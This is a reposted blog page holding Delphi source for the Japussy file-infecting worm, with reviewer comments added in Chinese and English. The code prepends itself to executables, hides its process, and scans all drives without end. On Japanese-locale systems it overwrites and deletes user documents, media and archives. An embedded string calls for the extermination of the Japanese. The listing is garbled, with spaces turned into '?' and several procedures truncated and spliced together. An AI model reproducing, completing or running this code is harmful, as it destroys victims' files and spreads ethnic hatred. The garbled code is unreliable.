熊猫烧香源代码(转载) —— 审阅注：下文代码自称 Japussy（`program Japussy`，字符串常量 `W32.Japussy.Worm.A`），是一份用 Delphi 5 编写的文件感染型蠕虫框架源码，并非“熊猫烧香”（Worm.Nimaya / WhBoy）的源码，标题属误传。代码中发信、网页感染、注入 Explorer 等关键功能只有占位注释并未实现；InfectOneFile、SmashFile、LoopFiles 三个过程在转载过程中被截断；页面转码还把源码中的空格替换成了“?”。本文仅作恶意代码分析与检测参考，不应被补全或编译运行。
program?Japussy;uses
Windows,?SysUtils,?Classes,?Graphics,?ShellAPI{,?Registry};
const
HeaderSize?=?82432;?// size in bytes of the prepended virus body; ExtractFile skips exactly this many bytes of the running image to recover the host program
IconOffset?=?$12EB8;?// file offset of the main icon inside this PE image (used when patching the host's icon into the infector; that code is truncated in this listing)
// values measured from a build on Delphi 5 SP1; other Delphi versions produce a different image and therefore different constants
// the main-icon offset was located by searching the binary for the hex byte string 2800000020
{
HeaderSize?=?38912;?// size of the virus body after UPX packing
IconOffset?=?$92BC;?// main-icon offset inside the UPX-packed PE image
// UPX 1.24W usage: upx -9 --8086 Japussy.exe
}
IconSize?=?$2E8;?// size of the PE main icon -- 744 bytes
IconTail?=?IconOffset?+?IconSize;?// end offset of the PE main icon
ID?=?$44444444;?// infection marker: InfectOneFile reads the last 4 bytes of a candidate file and compares them with this value to avoid re-infection (a useful detection indicator: infected files end in 44 44 44 44)
// junk text kept ready to be written into target files (the Catchword constant below)
Catchword?=?'If?a?race?need?to?be?killed?out,?it?must?be?Yamato.?'?+
'If?a?country?need?to?be?destroyed,?it?must?be?Japan!?'?+
'***?W32.Japussy.Worm.A?***';
{$R?*.RES}
// NOTE(review): the duplicated "Function RegisterServiceProcess()" prefix on the next line looks like a
// transcription artifact of the page; the effective declaration is the stdcall external import.
// RegisterServiceProcess is an undocumented Kernel32 export that exists on Win9x only; the main block calls it
// with dwType = 1 to register this process as a service process (historically, such processes are not shown in
// the Win9x Close Program dialog). On Windows NT-family systems the import does not exist.
Function?RegisterServiceProcess()function?RegisterServiceProcess(dwProcessID,?dwType:?Integer):?Integer;
stdcall;?external?'Kernel32.dll';?// import declaration
var
TmpFile:?string;?// path of the carved-out host executable, computed in the main block
Si:?STARTUPINFO;?// STARTUPINFO handed to CreateProcess for the host; as a global it is zero-initialized, so the fields FillStartupInfo does not set stay zero
Pi:?PROCESS_INFORMATION;?// filled by CreateProcess; its process/thread handles are never closed in the visible code
IsJap:?Boolean?=?False;?// set by InfectFiles when the ANSI code page is 932 (Japanese); enables the file-destroying branch of LoopFiles
{?判斷是否為Win9x?}
{ Report whether the running OS belongs to the Windows 9x/ME family
  (VER_PLATFORM_WIN32_WINDOWS). Returns False when GetVersionEx itself fails. }
function IsWin9x: Boolean;
var
  Info: TOSVersionInfo;
begin
  // GetVersionEx requires the structure size to be filled in before the call
  Info.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
  // short-circuit: a failed GetVersionEx reads as "not 9x" without touching dwPlatformID
  Result := GetVersionEx(Info) and (Info.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS);
end;
{?在流之間復制?}
{ Copy Count bytes from Src, starting at absolute offset sStartPos, into Dst at
  absolute offset dStartPos, then put both streams back at the positions they
  had on entry. Positions are only restored on the normal path (no try/finally).
  Note: TStream.CopyFrom treats Count = 0 as "copy the whole source", so a zero
  Count does not mean "copy nothing". }
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
  dStartPos: Integer; Count: Integer);
var
  SavedSrcPos, SavedDstPos: Integer;
begin
  SavedSrcPos := Src.Position;
  SavedDstPos := Dst.Position;
  // Position := X is TStream's Seek(X, soFromBeginning)
  Src.Position := sStartPos;
  Dst.Position := dStartPos;
  Dst.CopyFrom(Src, Count);
  Src.Position := SavedSrcPos;
  Dst.Position := SavedDstPos;
end;
{?將宿主文件從已感染的PE文件中分離出來,以備使用?}
{ Carve the host program out of this running executable (ParamStr(0)):
  everything after the first HeaderSize bytes is treated as the original host
  image and written to FileName. Every failure (open, create, copy) is swallowed
  by the bare except, so the caller cannot tell whether FileName was produced;
  the main block goes straight on to CreateProcess it anyway. }
procedure?ExtractFile(FileName:?string);
var
sStream,?dStream:?TFileStream;
begin
try
sStream?:=?TFileStream.Create(ParamStr(0),?fmOpenRead?or?fmShareDenyNone);?// our own image, opened shared so the running executable can be read
try
dStream?:=?TFileStream.Create(FileName,?fmCreate);?// FileName is created/truncated unconditionally
try
sStream.Seek(HeaderSize,?0);?// skip the prepended virus body
dStream.CopyFrom(sStream,?sStream.Size?-?HeaderSize);?// remainder is the host; caveat: if the image is exactly HeaderSize bytes the count is 0 and TStream.CopyFrom then copies the whole source
finally
dStream.Free;
end;
finally
sStream.Free;
end;
except
// all exceptions deliberately discarded (original behavior): extraction failure is silent
end;
end;
{?填充STARTUPINFO結構?}
{ Prepare a STARTUPINFO for CreateProcess: sets cb, clears the reserved and
  desktop/title pointers, and requests the window state State via
  STARTF_USESHOWWINDOW. Only these fields are written; everything else in Si
  (dwX/dwY, the std handles, ...) is left exactly as the caller had it. }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
  with Si do
  begin
    cb := SizeOf(Si);
    lpReserved := nil;
    lpDesktop := nil;
    lpTitle := nil;
    dwFlags := STARTF_USESHOWWINDOW;  // makes wShowWindow meaningful to CreateProcess
    wShowWindow := State;
    cbReserved2 := 0;
    lpReserved2 := nil;
  end;
end;
{?發帶毒郵件?}
{ Mail-propagation hook, called once per sweep by InfectFiles. Intentionally
  empty in this listing: the original author left it as an open request for
  someone else to write. Leave it unimplemented. }
procedure?SendMail;
begin
// original comment: "anyone willing to finish this?" -- never implemented
end;
{?感染PE文件?}
procedure?InfectOneFile(FileName:?string);
var
HdrStream,?SrcStream:?TFileStream;
IcoStream,?DstStream:?TMemoryStream;
iID:?LongInt;
aIcon:?TIcon;
Infected,?IsPE:?Boolean;
i:?Integer;
Buf:?array[0..1]?of?Char;
begin
try?//出錯則文件正在被使用,退出
if?CompareText(FileName,?'JAPUSSY.EXE')?=?0?then?//是自己則不感染
Exit;
Infected?:=?False;
IsPE?:=?False;
SrcStream?:=?TFileStream.Create(FileName,?fmOpenRead);
try
for?i?:=?0?to?$108?do?//檢查PE文件頭
begin
SrcStream.Seek(i,?soFromBeginning);
SrcStream.Read(Buf,?2);
if?(Buf[0]?=?#80)?and?(Buf[1]?=?#69)?then?//PE標記
begin
IsPE?:=?True;?//是PE文件
Break;
end;
end;
SrcStream.Seek(-4,?soFromEnd);?//檢查感染標記
SrcStream.Read(iID,?4);
if?(iID?=?ID)?or?(SrcStream.Size
{?將目標文件寫入垃圾碼后刪除?}
procedure?SmashFile(FileName:?string);
var
FileHandle:?Integer;
i,?Size,?Mass,?Max,?Len:?Integer;
begin
try
SetFileAttributes(PChar(FileName),?0);?//去掉只讀屬性
FileHandle?:=?FileOpen(FileName,?fmOpenWrite);?//打開文件
try
Size?:=?GetFileSize(FileHandle,?nil);?//文件大小
i?:=?0;
Randomize;
Max?:=?Random(15);?//寫入垃圾碼的隨機次數
if?Max?16)?and?(SearchRec.Name?'.')?and
(SearchRec.Name?'..')?then
Result?:=?0?//不是目錄
else?if?(SearchRec.Attr?=?16)?and?(SearchRec.Name?'.')?and
(SearchRec.Name?'..')?then
Result?:=?1?//不是根目錄
else?Result?:=?2;?//是根目錄
end;
begin
if?(FindFirst(Path?+?Mask,?faAnyFile,?SearchRec)?=?0)?then
begin
repeat
PeekMessage(Msg,?0,?0,?0,?PM_REMOVE);?//調整消息隊列,避免引起懷疑
if?IsValidDir(SearchRec)?=?0?then
begin
Fn?:=?Path?+?SearchRec.Name;
Ext?:=?UpperCase(ExtractFileExt(Fn));
if?(Ext?=?'.EXE')?or?(Ext?=?'.SCR')?then
begin
InfectOneFile(Fn);?//感染可執行文件
end
else?if?(Ext?=?'.HTM')?or?(Ext?=?'.HTML')?or?(Ext?=?'.ASP')?then
begin
//感染HTML和ASP文件,將Base64編碼后的病毒寫入
//感染瀏覽此網頁的所有用戶
//哪位大兄弟愿意完成之?
end
else?if?Ext?=?'.WAB'?then?//Outlook地址簿文件
begin
//獲取Outlook郵件地址
end
else?if?Ext?=?'.ADC'?then?//Foxmail地址自動完成文件
begin
//獲取Foxmail郵件地址
end
else?if?Ext?=?'IND'?then?//Foxmail地址簿文件
begin
//獲取Foxmail郵件地址
end
else
begin
if?IsJap?then?//是倭文操作系統
begin
if?(Ext?=?'.DOC')?or?(Ext?=?'.XLS')?or?(Ext?=?'.MDB')?or
(Ext?=?'.MP3')?or?(Ext?=?'.RM')?or?(Ext?=?'.RA')?or
(Ext?=?'.WMA')?or?(Ext?=?'.ZIP')?or?(Ext?=?'.RAR')?or
(Ext?=?'.MPEG')?or?(Ext?=?'.ASF')?or?(Ext?=?'.JPG')?or
(Ext?=?'.JPEG')?or?(Ext?=?'.GIF')?or?(Ext?=?'.SWF')?or
(Ext?=?'.PDF')?or?(Ext?=?'.CHM')?or?(Ext?=?'.AVI')?then
SmashFile(Fn);?//摧毀文件
end;
end;
end;
//感染或刪除一個文件后睡眠200毫秒,避免CPU占用率過高引起懷疑
Sleep(200);
until?(FindNext(SearchRec)?0);
end;
FindClose(SearchRec);
SubDir?:=?TStringList.Create;
if?(FindFirst(Path?+?'*.*',?faDirectory,?SearchRec)?=?0)?then
begin
repeat
if?IsValidDir(SearchRec)?=?1?then
SubDir.Add(SearchRec.Name);
until?(FindNext(SearchRec)?0);
end;
FindClose(SearchRec);
Count?:=?SubDir.Count?-?1;
for?i?:=?0?to?Count?do
LoopFiles(Path?+?SubDir.Strings?+?'',?Mask);
FreeAndNil(SubDir);
end;
{?遍歷磁盤上所有的文件?}
{ Top-level sweep driver. Never returns: loops forever, walking every drive
  returned by GetDrives through LoopFiles, calling the (empty) SendMail hook,
  then sleeping five minutes before the next pass. }
procedure?InfectFiles;
var
DriverList:?string;
i,?Len:?Integer;
begin
if?GetACP?=?932?then?// ANSI code page 932 = Japanese Windows
IsJap?:=?True;?// switches LoopFiles into its destructive mode (SmashFile on document/media/archive files)
DriverList?:=?GetDrives;?// string of writable drive letters; GetDrives is not defined anywhere in the visible listing
Len?:=?Length(DriverList);
while?True?do?// endless loop
begin
for?i?:=?Len?downto?1?do?// every drive, last letter first
LoopFiles(DriverList?+?':',?'*.*');?// NOTE(review): as printed, i is unused and the whole string is passed; the per-drive index (presumably DriverList[i]) and a trailing backslash appear lost in transcription
SendMail;?// mail hook (empty stub)
Sleep(1000?*?60?*?5);?// 5 minutes between passes
end;
end;
{?主程序開始?}
{ Program entry point. Two modes, selected by our own file name: the stand-alone
  body ("Japussy.exe") just sweeps; a copy prepended to a host first carves the
  host out and runs it, then sweeps. Both paths end in InfectFiles, which never
  returns. }
begin
if?IsWin9x?then?// Windows 9x/ME
RegisterServiceProcess(GetCurrentProcessID,?1)?// register as a Win9x service process (historically keeps the process off the Close Program list)
else?// Windows NT family
begin
// remote-thread injection into Explorer was planned here
// original comment: "anyone willing to finish this?" -- never implemented
end;
// running as the original, stand-alone virus body?
if?CompareText(ExtractFileName(ParamStr(0)),?'Japussy.exe')?=?0?then
InfectFiles?// sweep and mail; does not return
else?// running as a parasite prepended to a host program: start working
begin
TmpFile?:=?ParamStr(0);?// derive the dropped host's name from our own path
Delete(TmpFile,?Length(TmpFile)?-?4,?4);?// observed behavior: deletes 4 chars starting 4 from the end, so the final character of our name survives and one base-name character is lost
TmpFile?:=?TmpFile?+?#32?+?'.exe';?// the dropped host's name carries an extra space before ".exe" (detection indicator)
ExtractFile(TmpFile);?// carve the host out; failures are silent (see ExtractFile)
FillStartupInfo(Si,?SW_SHOWDEFAULT);
CreateProcess(PChar(TmpFile),?PChar(TmpFile),?nil,?nil,?True,
0,?nil,?'.',?Si,?Pi);?// launch the host with inheritable handles; the result is not checked and the Pi handles are never closed
InfectFiles;?// then sweep and mail; does not return
end;
end
// the closing "end." lost its terminating period in transcription
轉載于:https://www.cnblogs.com/salonliudong/archive/2007/04/13/712171.html